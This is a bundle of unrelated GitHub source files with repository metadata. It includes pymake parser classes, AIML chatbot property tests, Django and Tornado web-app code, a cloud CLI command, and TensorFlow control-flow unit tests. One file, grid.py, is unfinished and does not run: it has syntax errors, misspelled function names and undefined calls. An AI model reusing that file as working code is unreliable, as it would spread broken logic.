raise errors.DataError("Exporting all variables is not supported", self.exp.loc)
for v in vlist:
makefile.exportedvars[v] = True
def dump(self, fd, indent):
print("%sExport (single=%s) %s" % (indent, self.single, self.exp), file=fd)
def to_source(self):
return ('export %s' % self.exp.to_source()).rstrip()
def __eq__(self, other):
if not isinstance(other, ExportDirective):
return False
# single is irrelevant because it just says whether the next Statement
# contains a variable definition.
return self.exp == other.exp
class UnexportDirective(Statement):
"""
Represents the "unexport" directive.
This is the opposite of ExportDirective.
"""
__slots__ = ('exp',)
def __init__(self, exp):
self.exp = exp
def execute(self, makefile, context):
vlist = list(self.exp.resolvesplit(makefile, makefile.variables))
for v in vlist:
makefile.exportedvars[v] = False
def dump(self, fd, indent):
print("%sUnexport %s" % (indent, self.exp), file=fd)
def to_source(self):
return 'unexport %s' % self.exp.to_source()
def __eq__(self, other):
if not isinstance(other, UnexportDirective):
return False
return self.exp == other.exp
class EmptyDirective(Statement):
"""
Represents a standalone statement, usually an Expansion.
You will encounter EmptyDirective instances if there is a function
or similar at the top-level of a make file (e.g. outside of a rule or
variable assignment). You can also find them as the bodies of
ConditionBlock branches.
"""
__slots__ = ('exp',)
def __init__(self, exp):
assert isinstance(exp, (data.Expansion, data.StringExpansion))
self.exp = exp
def execute(self, makefile, context):
v = self.exp.resolvestr(makefile, makefile.variables)
if v.strip() != '':
raise errors.DataError("Line expands to non-empty value", self.exp.loc)
def dump(self, fd, indent):
print("%sEmptyDirective: %s" % (indent, self.exp), file=fd)
def to_source(self):
return self.exp.to_source()
def __eq__(self, other):
if not isinstance(other, EmptyDirective):
return False
return self.exp == other.exp
class _EvalContext(object):
__slots__ = ('currule', 'weak')
def __init__(self, weak):
self.weak = weak
class StatementList(list):
"""
A list of Statement instances.
This is what is generated by the parser when a make file is parsed.
Consumers can iterate over all Statement instances in this collection to
statically inspect (and even modify) make files before they are executed.
"""
__slots__ = ('mtime',)
def append(self, statement):
assert isinstance(statement, Statement)
list.append(self, statement)
def execute(self, makefile, context=None, weak=False):
if context is None:
context = _EvalContext(weak=weak)
for s in self:
s.execute(makefile, context)
def dump(self, fd, indent):
for s in self:
s.dump(fd, indent)
def __str__(self):
fd = StringIO()
self.dump(fd, '')
return fd.getvalue()
def to_source(self):
return '\n'.join([s.to_source() for s in self])
def iterstatements(stmts):
for s in stmts:
yield s
if isinstance(s, ConditionBlock):
for c, sl in s:
for s2 in iterstatments(sl): yield s2
| {
"content_hash": "c1ab9148be34215d890f27e81089ace1",
"timestamp": "",
"source": "github",
"line_count": 1015,
"max_line_length": 146,
"avg_line_length": 33.02660098522168,
"alnum_prop": 0.5958176719766124,
"repo_name": "mozilla/pymake",
"id": "833b06e73caf98ed9b63c22012c6f5d4ced56244",
"size": "33522",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pymake/parserdata.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "24"
},
{
"name": "C++",
"bytes": "130"
},
{
"name": "Python",
"bytes": "231366"
},
{
"name": "Shell",
"bytes": "73"
}
],
"symlink_target": ""
} |
import unittest
import os
from test.aiml_tests.client import TestClient
from programy.config.brain import BrainFileConfiguration
class BasicTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_configuration(self, arguments):
super(BasicTestClient, self).load_configuration(arguments)
self.configuration.brain_configuration._aiml_files = BrainFileConfiguration(files=os.path.dirname(__file__))
class BotAIMLTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
BotAIMLTests.test_client = BasicTestClient()
BotAIMLTests.test_client.bot.brain.properties.load_from_text("""
url:http://www.keithsterling.com/aiml
name:KeiffBot 1.0
firstname:Keiff
middlename:AIML
lastname:BoT
fullname:KeiffBot
email:[email protected]
gender:male
botmaster:Keith Sterling
organization:keithsterling.com
version:0.0.1
birthplace:Edinburgh, Scotland
job:mobile virtual assistant
species:robot
birthday:September 9th
birthdate:September 9th, 2016
sign:Virgo
logo:<img src="http://www.keithsterling.com/aiml/logo.png" width="128"/>
religion:Atheist
default-get:unknown
default-property:unknown
default-map:unknown
learn-filename:learn.aiml
""")
def test_bot_property_xxx(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY XXX")
self.assertIsNotNone(response)
self.assertEqual(response, "unknown")
def test_bot_property_url(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY URL")
self.assertIsNotNone(response)
self.assertEqual(response, "http://www.keithsterling.com/aiml")
def test_bot_property_name(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY NAME")
self.assertIsNotNone(response)
self.assertEqual(response, "KeiffBot 1.0")
def test_bot_property_firstname(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY FIRSTNAME")
self.assertIsNotNone(response)
self.assertEqual(response, "Keiff")
def test_bot_property_middlename(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY MIDDLENAME")
self.assertIsNotNone(response)
self.assertEqual(response, "AIML")
def test_bot_property_lastname(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY LASTNAME")
self.assertIsNotNone(response)
self.assertEqual(response, "BoT")
def test_bot_property_email(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY EMAIL")
self.assertIsNotNone(response)
self.assertEqual(response, "[email protected]")
def test_bot_property_gender(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY GENDER")
self.assertIsNotNone(response)
self.assertEqual(response, "male")
def test_bot_property_botmaster(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY BOTMASTER")
self.assertIsNotNone(response)
self.assertEqual(response, "Keith Sterling")
def test_bot_property_organisation(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY ORGANISATION")
self.assertIsNotNone(response)
self.assertEqual(response, "keithsterling.com")
def test_bot_property_version(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY VERSION")
self.assertIsNotNone(response)
self.assertEqual(response, "0.0.1")
def test_bot_property_birthplace(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY BIRTHPLACE")
self.assertIsNotNone(response)
self.assertEqual(response, "Edinburgh, Scotland")
def test_bot_property_birthday(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY BIRTHDAY")
self.assertIsNotNone(response)
self.assertEqual(response, "September 9th")
def test_bot_property_sign(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY SIGN")
self.assertIsNotNone(response)
self.assertEqual(response, "Virgo")
def test_bot_property_birthdate(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY BIRTHDATE")
self.assertIsNotNone(response)
self.assertEqual(response, "September 9th, 2016")
def test_bot_property_job(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY JOB")
self.assertIsNotNone(response)
self.assertEqual(response, "mobile virtual assistant")
def test_bot_property_species(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY SPECIES")
self.assertIsNotNone(response)
self.assertEqual(response, "robot")
def test_bot_property_religion(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY RELIGION")
self.assertIsNotNone(response)
self.assertEqual(response, "No religion, I am an Atheist")
def test_bot_property_logo(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY LOGO")
self.assertIsNotNone(response)
self.assertEqual(response, '<img src="http://www.keithsterling.com/aiml/logo.png" width="128"/>')
def test_bot_property_default_get(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY DEFAULT GET")
self.assertIsNotNone(response)
self.assertEqual(response, "unknown")
def test_bot_property_default_map(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY DEFAULT MAP")
self.assertIsNotNone(response)
self.assertEqual(response, "unknown")
def test_bot_property_default_property(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY DEFAULT PROPERTY")
self.assertIsNotNone(response)
self.assertEqual(response, "unknown")
def test_bot_property_default_learn_filename(self):
response = BotAIMLTests.test_client.bot.ask_question("test", "BOT PROPERTY LEARN FILENAME")
self.assertIsNotNone(response)
self.assertEqual(response, "learn.aiml")
| {
"content_hash": "2e4db7b2e870c148d967bb8ec2ee992f",
"timestamp": "",
"source": "github",
"line_count": 159,
"max_line_length": 116,
"avg_line_length": 42.61635220125786,
"alnum_prop": 0.6790141676505312,
"repo_name": "dkamotsky/program-y",
"id": "26e8e54f2ce29635e7ef91b193d49c3101d35fcb",
"size": "6776",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/test/aiml_tests/bot_tests/test_bot_aiml.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "937"
},
{
"name": "HTML",
"bytes": "1583"
},
{
"name": "Python",
"bytes": "1131157"
},
{
"name": "Shell",
"bytes": "3481"
}
],
"symlink_target": ""
} |
import numpy as np
def extremum(points,comp):
ext_x = 0.
ext_y = 0.
bleft = array([ext_x,ext_y])
for point in points:
if comp(point[0],ext_x) < 0:
ext_x = point[0]
if comp(point[1], ext_y) < 0:
ext_y = point[1]
return bleft
def upperight(points)
return extremum(points,lambda x:-cmp(x))
def bottomleft(points):
return emtremum(points,cmp)
class Grid:
def __init__(self,mesh,resolution):
self.grid = {}
self.resolution = resolution
coord = mesh.coordinates()
#box coordinates
bottomleft(coord)
upperright(coord)
grid = self.grid
for x in arange(bottomleft[0],upperright[0],resolution):
for y in arange(bottomleft[1],upperright[1],resolution):
grid[(x,y)] = []
#now that grid is constructed, start dumping points in
for point in coord:
grid[tuple(point/resolution)].append(point)
#now, at each grid point, dump in the nearest adjacent set of
#points. If the list is still empty, extend radius
for point in grid:
offsetx = range(-1,1)
| {
"content_hash": "927adcc59f7bc2e1649c09147faae2fa",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 63,
"avg_line_length": 24.317073170731707,
"alnum_prop": 0.6820461384152458,
"repo_name": "cwgreene/Nanostructure-Simulator",
"id": "d32999fe9561b02ec597beeb3749f2b006b65e9c",
"size": "997",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "grid.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "16108"
},
{
"name": "C++",
"bytes": "70367"
},
{
"name": "Python",
"bytes": "92258"
}
],
"symlink_target": ""
} |
from django.apps import AppConfig
class SolveitappConfig(AppConfig):
name = 'solveitapp'
| {
"content_hash": "86f3d7532e9c047727d5ecb88b269cb5",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 34,
"avg_line_length": 19,
"alnum_prop": 0.7684210526315789,
"repo_name": "kiss90benedek/solveit",
"id": "52b8720a800625dec088f01e0d03683e15f35b41",
"size": "95",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "solveit/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1472"
},
{
"name": "JavaScript",
"bytes": "1488"
},
{
"name": "Python",
"bytes": "11482"
},
{
"name": "Shell",
"bytes": "133"
}
],
"symlink_target": ""
} |
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = (
'djcelery_email',
'appconf',
)
SECRET_KEY = 'unique snowflake'
# Django 1.7 throws dire warnings if this is not set.
# We don't actually use any middleware, given that there are no views.
MIDDLEWARE_CLASSES = ()
CELERY_EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
CELERY_EMAIL_TASK_CONFIG = {
'queue': 'django_email',
'delivery_mode': 1, # non persistent
'rate_limit': '50/m', # 50 chunks per minute
}
| {
"content_hash": "bc1ed0da7a94e270024a4655be576092",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 70,
"avg_line_length": 23.28,
"alnum_prop": 0.6408934707903781,
"repo_name": "pmclanahan/django-celery-email",
"id": "e82c03e9ac9dbc61de27ef7878e00c30adda87ff",
"size": "582",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "26879"
},
{
"name": "Shell",
"bytes": "169"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
from tastypie.api import Api
from sxsw.api import PresenterResource, EventResource, TagResource
from django.views.generic import RedirectView, TemplateView
import settings
# API resources
v1_api = Api(api_name='v1')
v1_api.register(PresenterResource())
v1_api.register(EventResource())
v1_api.register(TagResource())
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'sxswtweets.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^api/', include(v1_api.urls)),
url(r'^sxsw/', include('sxsw.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^favicon\.ico$', RedirectView.as_view(url='http://' + settings.CLOUDFRONT_DOMAIN + settings.STATIC_DIRECTORY+ 'favicon.ico')),
url(r'^$', TemplateView.as_view(template_name='index.html')),
)
# if settings.DEBUG:
urlpatterns += patterns('',
url(r'^search/', include('haystack.urls')),
url(r'^autocomplete/', TemplateView.as_view(template_name='search/autocomplete.html'))
)
print settings.STATIC_URL + 'favicon.ico' | {
"content_hash": "ba838ea40249c6d9171046cdb846b8b7",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 136,
"avg_line_length": 31.666666666666668,
"alnum_prop": 0.7035087719298245,
"repo_name": "laud/upword-notes-sxsw",
"id": "eb54a108e61a6601b450a9122f0d58d0a3c5c78a",
"size": "1140",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sxswtweets/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "18719"
},
{
"name": "JavaScript",
"bytes": "24229"
},
{
"name": "Python",
"bytes": "53664"
}
],
"symlink_target": ""
} |
import datetime
from sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound
from workin.utils import importlib
NOW = datetime.datetime.now
class AuthHandlerMixin(object):
def __init__(self, *args, **kwargs):
super(AuthHandlerMixin, self).__init__(*args, **kwargs)
ext_path = 'workin.exts.auth'
self.require_setting('auth_user_model', ext_path)
self.require_setting('auth_session_key', ext_path)
self.require_setting('auth_cookie_key', ext_path)
self._auth_user = importlib.load_class(self.settings['auth_user_model'])
self._auth_session_key = self.settings['auth_session_key']
self._auth_cookie_key = self.settings['auth_cookie_key']
def authenticate(self, username, password):
"""Authenticates against `username` and `password`."""
try:
user = (self.db.query(self._auth_user)
.filter(self._auth_user.username == username).one())
if user.check_password(password):
return user
else:
return None
except (NoResultFound, MultipleResultsFound):
return None
def register(self, **kwargs):
"""Create an user.
If `next_url` is specified, redirect to it at last.
"""
next_url = kwargs.pop('next_url', None)
password = kwargs.pop('password')
user = self._auth_user(**kwargs)
user.set_password(password)
user.date_joined = NOW()
self.db.add(user)
self.db.commit()
if next_url:
self.redirect(next_url)
return user
def login(self, user, next_url=None):
"""Persist a user id and send session id as a cookie.
This way a user doesn't have to reauthenticate on every request.
If `next_url` is specified, redirect to it at last.
"""
user.last_login = NOW()
self.db.merge(user)
self.db.commit()
self.session[self._auth_session_key] = user.id
self.session.save()
# scanv login
# self.set_secure_cookie(self._auth_cookie_key, self.session.session_id,
# domain=self.settings.get('auth_cookie_domain', None),
# path=self.settings.get('auth_cookie_path', '/'),
# expires_days=self.settings.get('auth_cookie_expire_days'))
if next_url:
self.redirect(next_url)
def logout(self, next_url=None):
"""Removes the authenticated user's ID and clear cookies.
If `next_url` is specified, redirect to it at last.
"""
self.session.pop(self._auth_session_key, None)
self.session.save()
self.clear_cookie(self._auth_cookie_key)
if next_url:
self.redirect(next_url)
def get_current_user(self):
if self._auth_session_key in self.session:
user_id = self.session[self._auth_session_key]
user = (self.db.query(self._auth_user)
.filter(self._auth_user.id == user_id).first())
return user
return None
| {
"content_hash": "77d66ebde4f747ee5b57abda174f769f",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 80,
"avg_line_length": 32.97872340425532,
"alnum_prop": 0.5890322580645161,
"repo_name": "knownsec/workin",
"id": "4553939f4b8de8645064bbfd603a8c8bce847368",
"size": "3147",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "workin/exts/auth/handlers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "47912"
},
{
"name": "JavaScript",
"bytes": "281811"
},
{
"name": "Python",
"bytes": "102019"
},
{
"name": "Shell",
"bytes": "62"
}
],
"symlink_target": ""
} |
import catoclient.catocommand
from catoclient.param import Param
class ListUsers(catoclient.catocommand.CatoCommand):
Description = 'Lists Users'
API = 'list_users'
Examples = '''
_List all users_
cato-list-users
_List all users with Administrator role_
cato-list-users -f "Administrator"
'''
Options = [Param(name='filter', short_name='f', long_name='filter',
optional=True, ptype='string',
doc='''A string to use to filter the resulting data. Any row of data that has one field contains the string will be returned.''')]
def main(self):
results = self.call_api(self.API, ['filter'])
print(results)
| {
"content_hash": "feb005d911ef8dcd4a7e5ea6f1b6a68e",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 151,
"avg_line_length": 28.875,
"alnum_prop": 0.6479076479076479,
"repo_name": "cloudsidekick/catoclient",
"id": "4a470f9e05e5c91e16d15d213faa9fb65fa9b24f",
"size": "1419",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "catoclient/commands/listusers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "227800"
},
{
"name": "Ruby",
"bytes": "1000"
},
{
"name": "Tcl",
"bytes": "3573"
}
],
"symlink_target": ""
} |
"""Tests for tensorflow.ops.control_flow_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import cond_v2 # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import gen_logging_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops import while_v2 # pylint: disable=unused-import
# pylint: disable=unused-import
import tensorflow.python.ops.tensor_array_grad
# pylint: enable=unused-import
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.util import nest
def check_consumers(graph):
"""Sanity check on the consumer list of the tensors."""
consumer_count = {}
for op in graph.get_operations():
for v in op.inputs:
cnt = consumer_count.get(v, 0)
consumer_count[v] = cnt + 1
for k, v in consumer_count.items():
if len(k.consumers()) != v:
return False
return True
def all_fetchables():
tensor_names = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.outputs:
if graph.is_fetchable(t):
tensor_names.append(t.name)
return tensor_names
def all_feedables():
feedable_tensors = []
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_feedable(t):
feedable_tensors.append(t)
return feedable_tensors
def opt_cfg():
return config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(
optimizer_options=config_pb2.OptimizerOptions(
opt_level=config_pb2.OptimizerOptions.L1,
do_function_inlining=True,
do_constant_folding=True)))
def isum(s, maximum_iterations=None):
i = constant_op.constant(0, name="i")
c = lambda i, s: math_ops.less(i, 10)
b = lambda i, s: [math_ops.add(i, 1), math_ops.add(i, s)]
_, r_s = control_flow_ops.while_loop(
c, b, [i, s], maximum_iterations=maximum_iterations)
return r_s
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testRefIdentity(self):
with self.cached_session():
v = variables.VariableV1(7)
v = control_flow_ops._Identity(v)
op = state_ops.assign(v, 9)
v2 = control_flow_ops.with_dependencies([op], v)
self.assertTrue(isinstance(v2, ops.Tensor))
variables.global_variables_initializer().run()
self.assertEqual(9, v2.eval())
def testRefEnter(self):
with self.cached_session():
v = variables.VariableV1(7)
enter_v = control_flow_ops._Enter(v, "foo_1", is_constant=True)
nine = constant_op.constant(9)
enter_nine = gen_control_flow_ops.enter(nine, "foo_1")
op = state_ops.assign(enter_v, enter_nine)
v2 = control_flow_ops.with_dependencies([op], enter_v)
v3 = control_flow_ops.exit(v2)
variables.global_variables_initializer().run()
self.assertEqual(9, v3.eval())
def testRefSwitch(self):
with self.cached_session():
v = variables.VariableV1(7)
p = constant_op.constant(True)
v1 = control_flow_ops._SwitchRefOrTensor(v._ref(), p) # pylint: disable=protected-access
v2 = state_ops.assign(v1[1], 9)
variables.global_variables_initializer().run()
self.assertEqual(9, v2.eval())
def testEnterMulExit(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
enter_data = gen_control_flow_ops.enter(data, "foo_1", False)
five = constant_op.constant(5)
enter_five = gen_control_flow_ops.enter(five, "foo_1", False)
mul_op = math_ops.multiply(enter_data, enter_five)
exit_op = control_flow_ops.exit(mul_op)
result = exit_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testEnterShapePropagation(self):
with self.cached_session():
v = variables.Variable([0.0, 0.0], dtype=dtypes.float32)
# If is_constant=True, the shape information should be propagated.
enter_v_constant = gen_control_flow_ops.enter(
v, "frame1", is_constant=True)
self.assertEqual(enter_v_constant.shape, [2])
# Otherwise, the shape should be unknown.
enter_v_non_constant = gen_control_flow_ops.enter(
v, "frame2", is_constant=False)
self.assertEqual(enter_v_non_constant.shape, None)
def testSwitchMergeIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([1, 2, 3, 4, 5, 6])
indices = constant_op.constant([0, 2, 4, 6, 8, 10])
data = ops.IndexedSlices(values, indices)
pred = ops.convert_to_tensor(True)
switch_op = control_flow_ops.switch(data, pred)
merge_op = control_flow_ops.merge(switch_op)[0]
val = merge_op.values.eval()
ind = merge_op.indices.eval()
self.assertAllEqual(np.arange(1, 7), val)
self.assertAllEqual(np.arange(0, 12, 2), ind)
def testSwitchDeadBranch(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
dead_branch = array_ops.identity(switch_op[0])
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError,
lambda e: "Retval[0] does not have value" in str(e)):
dead_branch.eval()
def testSwitchMergeLess(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
zero = ops.convert_to_tensor(0)
one = ops.convert_to_tensor(1)
less_op = math_ops.less(zero, one)
switch_op = control_flow_ops.switch(data, less_op)
merge_op = control_flow_ops.merge(switch_op)[0]
result = merge_op.eval()
self.assertAllEqual(np.arange(1, 7), result)
def testSwitchMergeAddIdentity(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(False, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
id_op = array_ops.identity(switch_op[1])
merge_op = control_flow_ops.merge([add_op, id_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x + 1 for x in [1, 2, 3, 4, 5, 6]]), result)
def testSwitchMergeAddMul(self):
with self.cached_session():
data = constant_op.constant([1, 2, 3, 4, 5, 6], name="data")
ports = ops.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = constant_op.constant(1)
add_op = math_ops.add(switch_op[0], one)
five = constant_op.constant(5)
mul_op = math_ops.multiply(switch_op[1], five)
merge_op = control_flow_ops.merge([add_op, mul_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testLoop_false(self):
with self.cached_session():
false = ops.convert_to_tensor(False)
n = constant_op.constant(10)
enter_false = gen_control_flow_ops.enter(false, "foo_1", False)
enter_n = gen_control_flow_ops.enter(n, "foo_1", False)
merge_n = control_flow_ops.merge([enter_n, enter_n], name="merge_n")[0]
switch_n = control_flow_ops.switch(merge_n, enter_false)
exit_n = control_flow_ops.exit(switch_n[0])
next_n = control_flow_ops.next_iteration(switch_n[0])
merge_n.op._update_input(1, next_n)
result = exit_n.eval()
self.assertAllEqual(10, result)
def testLoop_1(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
with ops.device(test.gpu_device_name()):
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testLoop_2(self):
with self.cached_session():
zero = constant_op.constant(0)
one = constant_op.constant(1)
n = constant_op.constant(10)
enter_i = gen_control_flow_ops.enter(zero, "foo", False)
enter_one = gen_control_flow_ops.enter(one, "foo", True)
enter_n = gen_control_flow_ops.enter(n, "foo", True)
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = math_ops.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = math_ops.add(switch_i[1], enter_one)
with ops.device(test.gpu_device_name()):
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testDifferentFrame(self):
with self.cached_session():
data = array_ops.placeholder(dtypes.float32, shape=[])
enter_1 = gen_control_flow_ops.enter(data, "foo_1", False)
enter_2 = gen_control_flow_ops.enter(data, "foo_2", False)
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError("has inputs from different frames"):
res.eval(feed_dict={data: 1.0})
@test_util.disable_control_flow_v2("b/113294340")
def testCondBool(self):
values = constant_op.constant(10)
fn1 = lambda: math_ops.add(values, 1)
fn2 = lambda: math_ops.subtract(values, 1)
with self.assertRaisesRegexp(TypeError, "must not be a Python bool"):
_ = control_flow_ops.cond(False, fn1, fn2)
def testCondInt(self):
p = array_ops.placeholder(dtypes.bool, shape=[])
v = constant_op.constant(10)
fn1 = lambda: math_ops.add(v, 1)
fn2 = lambda: math_ops.subtract(v, 1)
y = control_flow_ops.cond(p, fn1, fn2)
grad = gradients_impl.gradients(y, [v])
self.assertAllEqual([None], grad)
def testFetchable(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
control_flow_ops.cond(
constant_op.constant(True), lambda: x + 2, lambda: x + 0)
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if graph.is_fetchable(t.op):
sess.run(t, feed_dict={x: 3})
else:
with self.assertRaisesRegexp(ValueError,
"has been marked as not fetchable"):
sess.run(t, feed_dict={x: 3})
@test_util.disable_control_flow_v2("Not relevant")
def testFeedable(self):
with self.cached_session() as sess:
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
self.assertEqual(1000, r.eval(feed_dict={i0: 0}))
feedable_tensors = all_feedables()
for t in feedable_tensors:
sess.run(r, feed_dict={t: 3})
graph = ops.get_default_graph()
for op in graph.get_operations():
for t in op.inputs:
if t not in feedable_tensors and t.dtype is dtypes.int32:
with self.assertRaisesRegexp(ValueError, "may not be fed"):
sess.run(r, feed_dict={t: 3})
@test_util.disable_control_flow_v2("b/113296180 (IndexedSlices)")
def testCondIndexedSlices(self):
with self.cached_session():
values = constant_op.constant(10)
indices = constant_op.constant(0)
x = ops.IndexedSlices(values, indices)
pred = math_ops.less(1, 2)
fn1 = lambda: ops.IndexedSlices(math_ops.add(x.values, 1), indices)
fn2 = lambda: ops.IndexedSlices(math_ops.subtract(x.values, 1), indices)
r = control_flow_ops.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
@test_util.disable_control_flow_v2("b/113296161 (SparseTensors)")
def testCondSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
